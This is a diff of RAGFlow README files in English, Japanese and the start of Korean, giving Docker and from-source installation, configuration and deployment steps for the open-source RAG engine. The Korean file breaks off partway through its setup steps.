+ $ pip uninstall -y onnxruntime-gpu
251
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
252
+ ```
253
+
254
+ 3. Copy the entry script and configure environment variables:
255
+
256
+ ```bash
257
+ # Get the Python path:
258
+ $ which python
259
+ # Get the ragflow project path:
260
+ $ pwd
261
+ ```
262
+
263
+ ```bash
264
+ $ cp docker/entrypoint.sh .
265
+ $ vi entrypoint.sh
266
+ ```
267
+
268
+ ```bash
269
+ # Adjust configurations according to your actual situation (the following two export commands are newly added):
270
+ # - Assign the result of `which python` to `PY`.
271
+ # - Assign the result of `pwd` to `PYTHONPATH`.
272
+ # - Comment out `LD_LIBRARY_PATH`, if it is configured.
273
+ # - Optional: Add Hugging Face mirror.
274
+ PY=${PY}
275
+ export PYTHONPATH=${PYTHONPATH}
276
+ export HF_ENDPOINT=https://hf-mirror.com
277
+ ```
278
+
279
+ 4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
280
+
281
+ ```bash
282
+ $ cd docker
283
+ $ docker compose -f docker-compose-base.yml up -d
284
+ ```
285
+
286
+ 5. Check the configuration files, ensuring that:
287
+
288
+ - The settings in **docker/.env** match those in **conf/service_conf.yaml**.
289
+ - The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
290
+
291
+ 6. Launch the RAGFlow backend service:
292
+
293
+ ```bash
294
+ $ chmod +x ./entrypoint.sh
295
+ $ bash ./entrypoint.sh
296
+ ```
297
+
298
+ 7. Launch the frontend service:
299
+
300
+ ```bash
301
+ $ cd web
302
+ $ npm install --registry=https://registry.npmmirror.com --force
303
+ $ vim .umirc.ts
304
+ # Update proxy.target to http://127.0.0.1:9380
305
+ $ npm run dev
306
+ ```
307
+
308
+ 8. Deploy the frontend service:
309
+
310
+ ```bash
311
+ $ cd web
312
+ $ npm install --registry=https://registry.npmmirror.com --force
313
+ $ umi build
314
+ $ mkdir -p /ragflow/web
315
+ $ cp -r dist /ragflow/web
316
+ $ apt install nginx -y
317
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
318
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
319
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
320
+ $ systemctl start nginx
321
+ ```
322
+
323
+ ## 📚 Documentation
324
+
325
+ - [Quickstart](https://ragflow.io/docs/dev/)
326
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
327
+ - [References](https://ragflow.io/docs/dev/category/references)
328
+ - [FAQ](https://ragflow.io/docs/dev/faq)
329
+
330
+ ## 📜 Roadmap
331
+
332
+ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
333
+
334
+ ## 🏄 Community
335
+
336
+ - [Discord](https://discord.gg/4XxujFgUN7)
337
+ - [Twitter](https://twitter.com/infiniflowai)
338
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
339
+
340
+ ## 🙌 Contributing
341
+
342
+ RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
README_ja.md ADDED
@@ -0,0 +1,289 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
22
+ alt="docker pull infiniflow/ragflow:v0.11.0"></a>
23
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
24
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
25
+ </a>
26
+ </p>
27
+
28
+ <h4 align="center">
29
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
30
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
31
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
32
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
33
+ <a href="https://demo.ragflow.io">Demo</a>
34
+ </h4>
35
+
36
+ ## 💡 RAGFlow とは?
37
+
38
+ [RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
39
+
40
+ ## 🎮 Demo
41
+
42
+ デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
43
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
44
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
45
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
46
+ </div>
47
+
48
+
49
+ ## 🔥 最新情報
50
+
51
+ - 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
52
+ - 2024-09-09 エージェントに医療相談テンプレートを追加しました。
53
+ - 2024-08-22 RAG を介したテキストから SQL ステートメントへの変換(Text-to-SQL)をサポートします。
54
+ - 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
55
+ - 2024-07-23 音声ファイルの解析をサポートしました。
56
+ - 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポート
57
+ - 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
58
+ - 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
59
+
60
+
61
+ ## 🌟 主な特徴
62
+
63
+ ### 🍭 **"Quality in, quality out"**
64
+
65
+ - 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
66
+ - 無限のトークンから"干し草の山の中の針"を見つける。
67
+
68
+ ### 🍱 **テンプレートベースのチャンク化**
69
+
70
+ - 知的で解釈しやすい。
71
+ - テンプレートオプションが豊富。
72
+
73
+ ### 🌱 **ハルシネーションが軽減された根拠のある引用**
74
+
75
+ - 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
76
+ - 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
77
+
78
+ ### 🍔 **多様なデータソースとの互換性**
79
+
80
+ - Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
81
+
82
+ ### 🛀 **自動化された楽な RAG ワークフロー**
83
+
84
+ - 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
85
+ - カスタマイズ可能な LLM とエンベッディングモデル。
86
+ - 複数の想起と融合された再ランク付け。
87
+ - 直感的な API によってビジネスとの統合がシームレスに。
88
+
89
+ ## 🔎 システム構成
90
+
91
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
92
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
93
+ </div>
94
+
95
+ ## 🎬 初期設定
96
+
97
+ ### 📝 必要条件
98
+
99
+ - CPU >= 4 cores
100
+ - RAM >= 16 GB
101
+ - Disk >= 50 GB
102
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
103
+ > ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
104
+
105
+ ### 🚀 サーバーを起動
106
+
107
+ 1. `vm.max_map_count` >= 262144 であることを確認する:
108
+
109
+ > `vm.max_map_count` の値をチェックするには:
110
+ >
111
+ > ```bash
112
+ > $ sysctl vm.max_map_count
113
+ > ```
114
+ >
115
+ > `vm.max_map_count` が 262144 以上でない場合は、262144 以上の値に再設定する。
116
+ >
117
+ > ```bash
118
+ > # In this case, we set it to 262144:
119
+ > $ sudo sysctl -w vm.max_map_count=262144
120
+ > ```
121
+ >
122
+ > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
123
+ >
124
+ > ```bash
125
+ > vm.max_map_count=262144
126
+ > ```
127
+
128
+ 2. リポジトリをクローンする:
129
+
130
+ ```bash
131
+ $ git clone https://github.com/infiniflow/ragflow.git
132
+ ```
133
+
134
+ 3. ビルド済みの Docker イメージを使用してサーバーを起動する:
135
+
136
+ ```bash
137
+ $ cd ragflow/docker
138
+ $ chmod +x ./entrypoint.sh
139
+ $ docker compose up -d
140
+ ```
141
+
142
+ > 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.11.0として、上記のコマンドを実行してください。
143
+
144
+ > コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
145
+
146
+ 4. サーバーを立ち上げた後、サーバーの状態を確認する:
147
+
148
+ ```bash
149
+ $ docker logs -f ragflow-server
150
+ ```
151
+
152
+ _以下の出力は、システムが正常に起動したことを確認するものです:_
153
+
154
+ ```bash
155
+ ____ ______ __
156
+ / __ \ ____ _ ____ _ / ____// /____ _ __
157
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
158
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
159
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
160
+ /____/
161
+
162
+ * Running on all addresses (0.0.0.0)
163
+ * Running on http://127.0.0.1:9380
164
+ * Running on http://x.x.x.x:9380
165
+ INFO:werkzeug:Press CTRL+C to quit
166
+ ```
167
+ > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
168
+
169
+ 5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
170
+ > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
171
+ 6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
172
+
173
+ > 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
174
+
175
+ _これで初期設定完了!ショーの開幕です!_
176
+
177
+ ## 🔧 コンフィグ
178
+
179
+ システムコンフィグに関しては、以下のファイルを管理する必要がある:
180
+
181
+ - [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
182
+ - [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
183
+ - [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
184
+
185
+ [.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
186
+
187
+ > [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
188
+
189
+ デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
190
+
191
+ > すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
192
+ >
193
+ > ```bash
194
+ > $ docker-compose up -d
195
+ > ```
196
+
197
+ ## 🛠️ ソースからビルドする
198
+
199
+ ソースからDockerイメージをビルドするには:
200
+
201
+ ```bash
202
+ $ git clone https://github.com/infiniflow/ragflow.git
203
+ $ cd ragflow/
204
+ $ docker build -t infiniflow/ragflow:v0.11.0 .
205
+ $ cd docker
206
+ $ chmod +x ./entrypoint.sh
207
+ $ docker compose up -d
208
+ ```
209
+
210
+ ## 🛠️ ソースコードからサービスを起動する方法
211
+
212
+ ソースコードからサービスを起動する場合は、以下の手順に従ってください:
213
+
214
+ 1. リポジトリをクローンします
215
+ ```bash
216
+ $ git clone https://github.com/infiniflow/ragflow.git
217
+ $ cd ragflow/
218
+ ```
219
+
220
+ 2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
221
+ ```bash
222
+ $ conda create -n ragflow python=3.11.0
223
+ $ conda activate ragflow
224
+ $ pip install -r requirements.txt
225
+ ```
226
+ CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
227
+ ```bash
228
+ $ pip uninstall -y onnxruntime-gpu
229
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
230
+ ```
231
+
232
+ 3. エントリースクリプトをコピーし、環境変数を設定します
233
+ ```bash
234
+ $ cp docker/entrypoint.sh .
235
+ $ vi entrypoint.sh
236
+ ```
237
+ 以下のコマンドで Python のパスとragflowプロジェクトのパスを取得します:
238
+ ```bash
239
+ $ which python
240
+ $ pwd
241
+ ```
242
+
243
+ `which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。
244
+
245
+ `LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。
246
+
247
+ ```bash
248
+ # 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
249
+ PY=${PY}
250
+ export PYTHONPATH=${PYTHONPATH}
251
+ # オプション:Hugging Face ミラーを追加
252
+ export HF_ENDPOINT=https://hf-mirror.com
253
+ ```
254
+
255
+ 4. 基本サービスを起動します
256
+ ```bash
257
+ $ cd docker
258
+ $ docker compose -f docker-compose-base.yml up -d
259
+ ```
260
+
261
+ 5. 設定ファイルを確認します
262
+ **docker/.env** 内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
263
+
264
+ 6. サービスを起動します
265
+ ```bash
266
+ $ chmod +x ./entrypoint.sh
267
+ $ bash ./entrypoint.sh
268
+ ```
269
+
270
+ ## 📚 ドキュメンテーション
271
+
272
+ - [Quickstart](https://ragflow.io/docs/dev/)
273
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
274
+ - [References](https://ragflow.io/docs/dev/category/references)
275
+ - [FAQ](https://ragflow.io/docs/dev/faq)
276
+
277
+ ## 📜 ロードマップ
278
+
279
+ [RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
280
+
281
+ ## 🏄 コミュニティ
282
+
283
+ - [Discord](https://discord.gg/4XxujFgUN7)
284
+ - [Twitter](https://twitter.com/infiniflowai)
285
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
286
+
287
+ ## 🙌 コントリビュート
288
+
289
+ RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
README_ko.md ADDED
@@ -0,0 +1,325 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+
36
+ ## 💡 RAGFlow란?
37
+
38
+ [RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
39
+
40
+
41
+
42
+ ## 🎮 데모
43
+ 데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
44
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
45
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
46
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
47
+ </div>
48
+
49
+
50
+ ## 🔥 업데이트
51
+
52
+ - 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.
53
+
54
+ - 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.
55
+
56
+ - 2024-08-22 RAG를 통해 텍스트를 SQL 문으로 변환하는 기능(Text-to-SQL)을 지원합니다.
57
+
58
+ - 2024-08-02: [graphrag](https://github.com/microsoft/graphrag)와 마인드맵에서 영감을 받은 GraphRAG를 지원합니다.
59
+
60
+ - 2024-07-23: 오디오 파일 분석을 지원합니다.
61
+
62
+ - 2024-07-08: [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.
63
+
64
+ - 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.
65
+
66
+ - 2024-05-23: 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.
67
+
68
+
69
+
70
+ ## 🌟 주요 기능
71
+
72
+ ### 🍭 **"Quality in, quality out"**
73
+ - [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
74
+ - 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
75
+
76
+ ### 🍱 **템플릿 기반의 chunking**
77
+ - 똑똑하고 설명 가능한 방식.
78
+ - 다양한 템플릿 옵션을 제공합니다.
79
+
80
+
81
+ ### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
82
+ - 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
83
+ - 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
84
+
85
+
86
+ ### 🍔 **다른 종류의 데이터 소스와의 호환성**
87
+ - 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
88
+
89
+ ### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
90
+ - 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
91
+ - 구성 가능한 LLM 및 임베딩 모델.
92
+ - 다중 검색과 결합된 re-ranking.
93
+ - 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
94
+
95
+
96
+ ## 🔎 시스템 아키텍처
97
+
98
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
99
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
100
+ </div>
101
+
102
+ ## 🎬 시작하기
103
+ ### 📝 사전 준비 사항
104
+ - CPU >= 4 cores
105
+ - RAM >= 16 GB
106
+ - Disk >= 50 GB
107
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
108
+ > 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.
109
+
110
+
111
+ ### 🚀 서버 시작하기
112
+
113
+ 1. `vm.max_map_count`가 262144 이상인지 확인하세요:
114
+ > `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
115
+ >
116
+ > ```bash
117
+ > $ sysctl vm.max_map_count
118
+ > ```
119
+ >
120
+ > 만약 `vm.max_map_count` 값이 262144보다 작다면 값을 재설정하세요.
121
+ >
122
+ > ```bash
123
+ > # 이 경우에는 262144로 설정합니다:
124
+ > $ sudo sysctl -w vm.max_map_count=262144
125
+ > ```
126
+ >
127
+ > 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
128
+ >
129
+ > ```bash
130
+ > vm.max_map_count=262144
131
+ > ```
132
+
133
+ 2. 레포지토리를 클론하세요:
134
+
135
+ ```bash
136
+ $ git clone https://github.com/infiniflow/ragflow.git
137
+ ```
138
+
139
+ 3. 미리 빌드된 Docker 이미지를 사용하여 서버를 시작하세요:
140
+
141
+ > 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 버전의 Docker 이미지를 다운로드하고 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전(예: `RAGFLOW_VERSION=v0.11.0`)으로 업데이트한 후 다음 명령어를 실행하세요.
142
+ ```bash
143
+ $ cd ragflow/docker
144
+ $ chmod +x ./entrypoint.sh
145
+ $ docker compose up -d
146
+ ```
147
+
148
+ > 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.
149
+
150
+
151
+ 4. 서버가 시작된 후 서버 상태를 확인하세요:
152
+
153
+ ```bash
154
+ $ docker logs -f ragflow-server
155
+ ```
156
+
157
+ _다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
158
+
159
+ ```bash
160
+ ____ ______ __
161
+ / __ \ ____ _ ____ _ / ____// /____ _ __
162
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
163
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
164
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
165
+ /____/
166
+
167
+ * Running on all addresses (0.0.0.0)
168
+ * Running on http://127.0.0.1:9380
169
+ * Running on http://x.x.x.x:9380
170
+ INFO:werkzeug:Press CTRL+C to quit
171
+ ```
172
+ > 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.
173
+
174
+ 5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
175
+ > 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
176
+ 6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
177
+ > 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
178
+
179
+ _이제 쇼가 시작됩니다!_
180
+
181
+ ## 🔧 설정
182
+
183
+ 시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
184
+
185
+ - [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
186
+ - [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
187
+ - [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
188
+
189
+ [.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.
190
+
191
+ > [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.
192
+
193
+ 기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
194
+
195
+ > 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
196
+ >
197
+ > ```bash
198
+ > $ docker-compose up -d
199
+ > ```
200
+
201
+ ## 🛠️ 소스에서 빌드하기
202
+
203
+ Docker 이미지를 소스에서 빌드하려면:
204
+
205
+ ```bash
206
+ $ git clone https://github.com/infiniflow/ragflow.git
207
+ $ cd ragflow/
208
+ $ docker build -t infiniflow/ragflow:dev .
209
+ $ cd docker
210
+ $ chmod +x ./entrypoint.sh
211
+ $ docker compose up -d
212
+ ```
213
+
214
+
215
+ ## 🛠️ 소스에서 서비스 시작하기
216
+
217
+ 서비스를 소스에서 시작하려면:
218
+
219
+ 1. 레포지토리를 클론하세요:
220
+
221
+ ```bash
222
+ $ git clone https://github.com/infiniflow/ragflow.git
223
+ $ cd ragflow/
224
+ ```
225
+
226
+ 2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
